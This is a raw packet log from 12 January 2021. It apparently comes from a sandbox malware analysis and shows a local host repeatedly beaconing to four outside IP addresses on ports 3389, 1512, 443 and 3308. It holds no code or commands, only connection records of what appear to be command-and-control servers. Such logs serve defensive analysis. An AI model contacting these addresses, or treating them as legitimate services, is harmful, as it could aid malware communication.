Jan 12, 2021 07:44:12.638858080 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.641125917 CET	49238	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:12.695362091 CET	3389	49238	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:12.760215998 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.813193083 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:12.813500881 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.814393997 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.867461920 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:12.874666929 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:12.874687910 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:12.874963999 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.889909029 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.943986893 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:12.944166899 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.948682070 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:12.948815107 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:13.002095938 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.002192020 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:13.041924953 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.055051088 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.055072069 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.156291008 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.156311989 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.156466007 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:13.159490108 CET	49239	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:13.212327003 CET	1512	49239	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:13.268987894 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.321306944 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.321533918 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.323057890 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.376240015 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.389673948 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.389761925 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.401676893 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.456181049 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.456378937 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.461374998 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.461626053 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.513992071 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.514163971 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.550914049 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.566684961 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.685213089 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.685239077 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.685415030 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.691173077 CET	49240	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:13.743351936 CET	443	49240	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:13.805883884 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.849227905 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:13.849427938 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.850800991 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.893867016 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:13.904557943 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:13.904582977 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:13.904675961 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.911943913 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.956887960 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:13.957027912 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.961668015 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:13.961831093 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:14.004971027 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.005165100 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:14.045892954 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.048366070 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.048382998 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.160357952 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.160384893 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.160676956 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:14.163671970 CET	49241	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:14.206958055 CET	3308	49241	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:14.271055937 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.326546907 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.326644897 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.327883005 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.382262945 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.406141996 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.406167984 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.406281948 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.415803909 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.480703115 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.480871916 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.486373901 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.486489058 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.540883064 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.541204929 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.580827951 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.595813990 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.595849991 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.686503887 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.686548948 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.686630011 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.686696053 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.692346096 CET	49242	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:14.746543884 CET	3389	49242	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:14.809514999 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.862561941 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:14.862718105 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.864281893 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.917468071 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:14.924519062 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:14.924551010 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:14.924666882 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.925669909 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.938692093 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.992813110 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:14.993020058 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.997250080 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:14.997396946 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:15.050544024 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:15.050745010 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:15.089791059 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:15.103868008 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:15.208589077 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:15.208632946 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:15.208878040 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:15.211860895 CET	49243	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:15.264832973 CET	1512	49243	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:15.331192970 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.383399963 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.383507013 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.385399103 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.437519073 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.452431917 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.452524900 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.459089994 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.513530970 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.513633013 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.520528078 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.520756006 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.572825909 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.572916985 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.625082016 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.743309975 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.743355989 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.743508101 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.746912956 CET	49244	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:15.799236059 CET	443	49244	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:15.858710051 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:15.901896000 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:15.901973009 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:15.902992010 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:15.946120024 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:15.956692934 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:15.956718922 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:15.956834078 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:15.969135046 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.015144110 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:16.015434980 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.021086931 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.021266937 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.064552069 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:16.064898968 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.108037949 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:16.221143007 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:16.221172094 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:16.221333027 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.223474026 CET	49245	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:16.266664028 CET	3308	49245	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:16.330328941 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.385473967 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.385632038 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.386939049 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.441911936 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.463562965 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.463608027 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.463675976 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.463702917 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.471698046 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.531811953 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.531994104 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.548424959 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.548475027 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.603049994 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.603223085 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.642776012 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.658273935 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.658309937 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.750137091 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.750185013 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.750236988 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.750274897 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.752819061 CET	49246	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:16.807702065 CET	3389	49246	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:16.860668898 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:16.913856030 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:16.913942099 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:16.915874004 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:16.968836069 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:16.975900888 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:16.975934982 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:16.976046085 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:16.992105961 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.046628952 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.046842098 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.057058096 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.057431936 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.110450983 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.110651016 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.149893999 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.164031029 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.263952017 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.264023066 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.264213085 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.270011902 CET	49247	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:17.323283911 CET	1512	49247	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:17.391069889 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.443116903 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.443208933 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.444622993 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.496447086 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.511456013 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.511529922 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.521008015 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.575555086 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.575762987 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.582473040 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.582703114 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.634624958 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.634840965 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.686984062 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.805378914 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.805445910 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.805469990 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.805497885 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.807540894 CET	49248	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:17.859541893 CET	443	49248	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:17.919490099 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:17.962806940 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:17.963006973 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:17.964454889 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.007499933 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.027338028 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.027381897 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.027529001 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.040787935 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.086951017 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.087382078 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.097253084 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.097578049 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.140645027 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.141011953 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.181039095 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.184202909 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.184221029 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.297334909 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.297362089 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.297627926 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.303550959 CET	49249	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:18.346584082 CET	3308	49249	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:18.419291973 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.473227024 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.473345995 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.475141048 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.528805971 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.549889088 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.549911022 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.549982071 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.563251019 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.625092030 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.625327110 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.636046886 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.636302948 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.689889908 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.690191031 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.729815960 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.744569063 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.744612932 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.834297895 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.834350109 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.834417105 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.835387945 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.837480068 CET	49250	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:18.891311884 CET	3389	49250	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:18.946105003 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:18.999221087 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:18.999334097 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.000623941 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.053622961 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.060610056 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.060652971 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.060719967 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.078912020 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.133238077 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.133495092 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.137965918 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.138065100 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.191135883 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.191431999 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.229722977 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.244579077 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.244599104 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.345930099 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.345988989 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.346224070 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.352232933 CET	49251	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:19.405296087 CET	1512	49251	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:19.466099024 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.518326044 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.518513918 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.519453049 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.571404934 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.586059093 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.587104082 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.601638079 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.656179905 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.656480074 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.666794062 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.667109013 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.719533920 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.719826937 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.771953106 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.890144110 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.890189886 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:19.890422106 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.896173000 CET	49252	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:19.948688984 CET	443	49252	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:20.010592937 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.053941011 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.054100990 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.054686069 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.097807884 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.108232021 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.108264923 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.108299017 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.108325958 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.115268946 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.160403013 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.160468102 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.166668892 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.166903019 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.210062981 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.210230112 CET	49253	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:20.250041962 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.253374100 CET	3308	49253	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:20.253429890 CET	3308	49253	80.86.91.27	192.168.2.22
